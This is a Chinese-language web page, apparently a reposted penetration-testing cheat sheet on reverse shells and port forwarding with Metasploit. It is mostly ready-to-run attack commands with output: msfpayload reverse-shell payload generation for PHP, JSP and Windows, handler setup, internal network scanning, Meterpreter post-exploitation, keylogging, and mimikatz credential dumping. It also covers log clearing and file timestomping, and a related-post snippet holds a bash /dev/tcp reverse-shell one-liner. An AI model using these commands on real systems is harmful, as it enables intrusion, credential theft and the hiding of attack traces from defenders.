from:https://www.91ri.org/9367.html

Web渗透中的反弹Shell与端口转发

php需未禁用exec函数
一:生成php反弹脚本
msf > msfpayload php/reverse_php LHOST=x.x.x.x LPORT=2333 R > re.php

将文件传入shell中,在msf中开一个handler
msf > use multi/handler
msf exploit(handler) > set PAYLOAD php/reverse_php
msf exploit(handler) > set LHOST x.x.x.x
msf exploit(handler) > set LPORT 2333
msf exploit(handler) > exploit

此时访问re.php,即可反弹到本地一个shell

当然,用nc直接监听端口也是可以的
nc -lvv 2333
其他可以考虑使用msf编码变形等,github也有这样一个脚本 https://github.com/keshy/cwg_tools/blob/master/php-reverse-shell.php 可供参考

JSP
msfpayload java/jsp_shell_reverse_tcp LHOST=x.x.x.x R > re.jsp

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD java/jsp_shell_reverse_tcp
msf exploit(handler) > set LHOST 192.168.10.1
msf exploit(handler) > exploit

内网扫描

meterpreter > run autoroute -s 192.168.3.98  自动添加路由表
meterpreter > background
msf exploit(handler) > use auxiliary/scanner/portscan/tcp

msf auxiliary(tcp) > set PORTS 80,8080,21,22,3389,445,1433,3306

PORTS => 80,8080,21,22,3389,445,1433,3306

msf auxiliary(tcp) > set RHOSTS 192.168.3.1/24

RHOSTS => 192.168.3.1/24

msf auxiliary(tcp) > set THERADS 10

THERADS => 10

msf auxiliary(tcp) > exploit

基本命令:

background  # 让meterpreter处于后台模式

sessions -i number   # 与会话进行交互,number表示第n个session

quit  # 退出会话

shell # 获得命令行

cat c:\\boot.ini   # 查看文件内容

getwd # 查看当前工作目录 work directory

upload /root/Desktop/netcat.exe c:\\ # 上传文件到目标机上

download 0xfa.txt /root/Desktop/   # 下载文件到本机上

edit c:\\boot.ini  # 编辑文件

search -d d:\\www -f web.config # search 文件

ps # 查看当前活跃进程

migrate  pid # 将Meterpreter会话移植到进程数位pid的进程中

execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互

getpid # 获取当前进程的pid

kill pid # 杀死进程

getuid # 查看权限

sysinfo # 查看目标机系统信息,如机器名,操作系统等

getsystem #提权操作

timestompc:/a.doc -c "10/27/2015 14:22:11" #修改文件的创建时间

迁移进程

migrate pid

清理痕迹:)

meterpreter > clearev

获取敏感信息(Windows版本 Linux自行选择)

run post/windows/gather/checkvm #是否虚拟机

run post/windows/gather/enum_applications #获取安装软件信息

run post/windows/gather/dumplinks   #获取最近的文件操作

run post/windows/gather/enum_ie  #获取IE缓存

run post/windows/gather/enum_chrome   #获取Chrome缓存

run scraper                      #获取常见信息

#保存在~/.msf4/logs/scripts/scraper/目录下

meterpreter常见脚本

arp_scanner

利用arp进行存活主机扫描

meterpreter > run arp_scanner -r 10.24.20.1/24
[*] ARP Scanning 10.24.20.1/24
[*] IP: 10.24.20.1 MAC 58:6a:b1:b4:a6:02
[*] IP: 10.24.20.7 MAC 00:26:9e:8a:7d:a9
[*] IP: 10.24.20.11 MAC c4:54:44:29:42:df

autoroute

可以添加,删除,显示路由表

checkvm

检测目标是否是虚拟机

meterpreter > run checkvm

[*] Checking if target is a Virtual Machine .....

[*] It appears to be physical host.

credcollect

收集目标主机上的hash等凭证

domain_list_gen

获取域管理账户列表,并判断当前session所在用户是否在列表中

duplicate

再次产生payload,注入到其他进程或打开新进程并注入其中

enum_firefox

获取firefox中的信息,包括cooikie,历史纪录,书签等

enum_chrome

获取chrome中的信息

event_manager

可以查询和清理事件日志

getgui

可以很方便的开启远程桌面服务,添加用户,端口转发功能

meterpreter > run getgui -h
Windows Remote Desktop Enabler Meterpreter Script
Usage: getgui -u <username> -p <password>
Or: getgui -e

OPTIONS:

-e Enable RDP only.
-f <opt> Forward RDP Connection.
-h Help menu.
-p <opt> The Password of the user to add.
-u <opt> The Username of the user to add.

get_local_subnets

获得本地的子网

get_pidgin_creds

获取pidgin配置文件中的用户名和密码

from:http://drops.wooyun.org/tips/9732

from:http://drops.wooyun.org/tips/10146

键盘记录

meterpreter > keyscan_start

Starting the keystroke sniffer...

meterpreter > keyscan_dump

Dumping captured keystrokes...

dir <Return> cd  <Ctrl>  <LCtrl>

meterpreter > keyscan_stop

Stopping the keystroke sniffer...

获取明文密码

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM    

meterpreter > load mimikatz

Loading extension mimikatz...success.

meterpreter > msv

[+] Running as SYSTEM

[*] Retrieving msv credentials    

meterpreter > kerberos

[+] Running as SYSTEM

[*] Retrieving kerberos credentials

kerberos credentials

====================    

meterpreter > mimikatz_command -f samdump::hashes

Ordinateur : Testing

BootKey    : 8c2c8d96e92a8ccfc407a1ca48531239    

meterpreter > mimikatz_command -f sekurlsa::searchPasswords

[0] { Croxy ; Testing ; hehe }

[1] { test ; Testing ; test }

端口转发

meterpreter > portfwd add -l 1234 -p 3389 -r 10.42.0.54

[*] Local TCP relay created: 0.0.0.0:8081 <-> 10.42.0.54:80
将远程主机3389端口转发到本地1234端口上

msfpayload windows/meterpreter/reverse_tcp LHOST=本机IP LPORT=4444端口 x > /root/Desktop/1.exe

依次输入以下命令 use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_top

set LHOST 本机Ip
exploit

内网渗透中的反弹Shell与端口转发的更多相关文章

  1. 内网渗透中SSh的巧用

    后续应该会做个实例 转自:http://www.myhack58.com/Article/html/3/8/2009/25156.htm 经常遇到如下情形,内部网络主机通过路由器或者安全设备做了访问控 ...

  2. 内网渗透中的mimikatz

    0x00 前言 上篇测试了中间人攻击利用框架bettercap,这次挑选一款更具代表性的工具--mimikatz 0x01 简介 mimikatz,很多人称之为密码抓取神器,但在内网渗透中,远不止这么 ...

  3. 内网渗透中mimikatz的使用

    0x01 简介 mimikatz,很多人称之为密码抓取神器,但在内网渗透中,远不止这么简单 0x02 测试环境 网络资源管理模式: 域 已有资源: 域内一台主机权限 操作系统:win7 x64 域权限 ...

  4. 内网渗透中的NTLM-Hash Relay

    基础知识 NTLN和Net-NTLM 1.NTLM(V1/V2)的hash是存放在安全账户管理(SAM)数据库以及域控的NTDS.dit数据库中,获取该Hash值可以直接进行PtH攻击,我博客中前文也 ...

  5. 反弹shell以及端口转发的方法收集

    Bash bash -i >& /dev/tcp/192.168.1.142/80 0>&1 exec 5<>/dev/tcp/192.168.1.142/80 ...

  6. 内网渗透测试思路-FREEBUF

    (在拿到webshell的时候,想办法获取系统信息拿到系统权限) 一.通过常规web渗透,已经拿到webshell.那么接下来作重要的就是探测系统信息,提权,针对windows想办法开启远程桌面连接, ...

  7. metasploit渗透测试笔记(内网渗透篇)

    x01 reverse the shell File 通常做法是使用msfpayload生成一个backdoor.exe然后上传到目标机器执行.本地监听即可获得meterpreter shell. r ...

  8. Metasploit 内网渗透篇

    0x01 reverse the shell File 通常做法是使用msfpayload生成一个backdoor.exe然后上传到目标机器执行.本地监听即可获得meterpreter shell. ...

  9. 3.内网渗透之reGeorg+Proxifier

    aaarticlea/png;base64,iVBORw0KGgoAAAANSUhEUgAAAxIAAAE2CAIAAAB6BDOVAAAgAElEQVR4Aey9Z5Aex3X327MRGVzkRH ...

随机推荐

  1. 2016-1-3点菜系统demo的实现,pickerView的学习

    // // ViewController.m // pickView // // Created by Mac on 16/1/3. // Copyright © 2016年 Mac. All rig ...

  2. 学习笔记:APP切图那点事儿–详细介绍android和ios平台

    学习笔记:APP切图那点事儿–详细介绍android和ios平台 转载自:http://www.woofeng.cn/articles/168.html   版权归原作者所有 作者:亚茹有李 原文地址 ...

  3. 学习笔记:js、css、html判断浏览器的各种版本

    js.css.html判断浏览器的各种版本 (转载自:http://www.jb51.net/web/42244.html  版权归原作者所有) 利用正则表达式来判断ie浏览器版本 判断是否IE浏览器 ...

  4. 【转】使用Xcode 6将你的项目本地化

    原文转自:http://www.cocoachina.com/ios/20141004/9827.html iOS和OSX支持40种语言的本地化,Xcode无疑为这一过程提供了强有力的支持.苹果将这一 ...

  5. How to install more voices to Windows Speech?

    !!!WARNING!!! This involves manual edits to your registry. If you mess it up, don't blame me. Do at ...

  6. dedecms织梦

    dedecms的安装,其修改连接数据库文件是:common.inc.php

  7. 实现简单ThreadPool

    在很多的应用场景,需要根据任务去创建线程去异步处理问题,不过不停的创建线程和销毁线程本身是一个非常耗时和消耗系统资源的事情,所以通常这种情况使用线程池来实现,常用的场景比如web容器对于web请求的处 ...

  8. MySQL数据库性能优化的关键参数(转)

    我们在进行数据库管理和开发中经常会遇到性能问题,这就涉及到MySQL的性能优化.通过在网络上查找资料和笔者自己的尝试,我认为以下系统参数是比较关键的: 关键参数一:back_log 要求 MySQL ...

  9. c++11编码规范 NULL还是nullptr

    0和nullptr/NULL 至于指针(地址值),根据实际选择用0.NULL还是nullptr.对使用了C++11特性的项目,选用nullptr:对于C++03项目,推荐NULL,因为它像是一个指针

  10. wxPython

    wxPython是python GUI的工具箱. 一, 安装 http://wiki.wxpython.org/How%20to%20install%20wxPython 稳定的wxpython 需要 ...